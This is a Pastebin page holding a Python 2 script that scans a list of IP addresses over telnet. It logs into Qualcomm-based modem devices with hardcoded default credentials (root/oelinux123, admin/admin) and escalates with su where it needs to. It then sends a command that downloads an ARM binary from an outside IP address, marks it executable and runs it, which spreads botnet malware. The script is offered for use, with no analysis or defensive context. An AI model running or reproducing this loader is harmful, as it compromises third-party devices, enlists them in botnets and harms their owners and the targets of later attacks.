API tools faq
paste
Guest User

Untitled

a guest
Apr 23rd, 2017
188
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.25 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. import threading, sys, time, random, socket, re, os
  3.  
  4. if len(sys.argv) < 2:
  5.         print "Usage: python "+sys.argv[0]+" <list>"
  6.         sys.exit()
  7.  
  8. ips = open(sys.argv[1], "r").readlines()
  9. usernames = ["root", "admin"]
  10. passwords = ["oelinux123", "admin"]
  11. cmd = "cd /tmp; rm -rf tftp; wget http://46.166.148.149/lel4 -O tftp; chmod +x tftp; ./tftp; rm -rf tftp" #arm4 binary
  12. count = 0
  13. def readUntil(tn, string, timeout=15):
  14.     buf = ''
  15.     start_time = time.time()
  16.     while time.time() - start_time < timeout:
  17.         buf += tn.recv(1024)
  18.         time.sleep(0.01)
  19.         if string in buf: return buf
  20.     raise Exception('TIMEOUT!')
  21.  
  22. class hackify(threading.Thread):
  23.         def __init__ (self, ip):
  24.             threading.Thread.__init__(self)
  25.             self.ip = str(ip).rstrip('\n')
  26.         def run(self):
  27.         try:
  28.             tn = socket.socket()
  29.             tn.settimeout(8)
  30.             tn.connect((self.ip,23))
  31.         except Exception:
  32.             tn.close()
  33.         try:
  34.             hoho = ''
  35.             hoho += readUntil(tn, ":")
  36.             if "mdm9625" in hoho: #non-root
  37.                 r00t = 0
  38.                 username = usernames[1]
  39.                 password = passwords[1]
  40.                 tn.send(username + "\n")
  41.                 #print "[%s] sending non-root user"%(self.ip)
  42.             elif "9615-cdp" in hoho: #root
  43.                 r00t = 1
  44.                 username = usernames[0]
  45.                 password = passwords[0]
  46.                 tn.send(username + "\n")
  47.                 #print "[%s] sending root user"%(self.ip)
  48.         except Exception:
  49.             tn.close()
  50.         try:
  51.             hoho = ''
  52.             hoho += readUntil(tn, "Password:")
  53.             if "assword" in hoho:
  54.                 tn.send(password + "\n")
  55.                 #if r00t: print "[%s] sending root password"%(self.ip)
  56.                 #if not r00t: print "[%s] sending non-root password"%(self.ip)
  57.                 time.sleep(3)
  58.         except Exception:
  59.             tn.close()
  60.         try:
  61.             mp = ''
  62.             mp += tn.recv(1024)
  63.             if "#" in mp or "$" in mp:
  64.                 if r00t: tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
  65.                 if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send(cmd + "\n"); print "command sent %s!"%(self.ip); time.sleep(10); tn.close()
  66.         except Exception:
  67.             print "[%s] TIMEOUT"%(count)
  68.             tn.close()
  69.  
  70. print "Total IPs: %s\n"%(len(ips))
  71. for ip in ips:
  72.     try:
  73.         count += 1
  74.         t = hackify(ip)
  75.         t.start()
  76.         time.sleep(0.01)
  77.     except:
  78.         pass
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!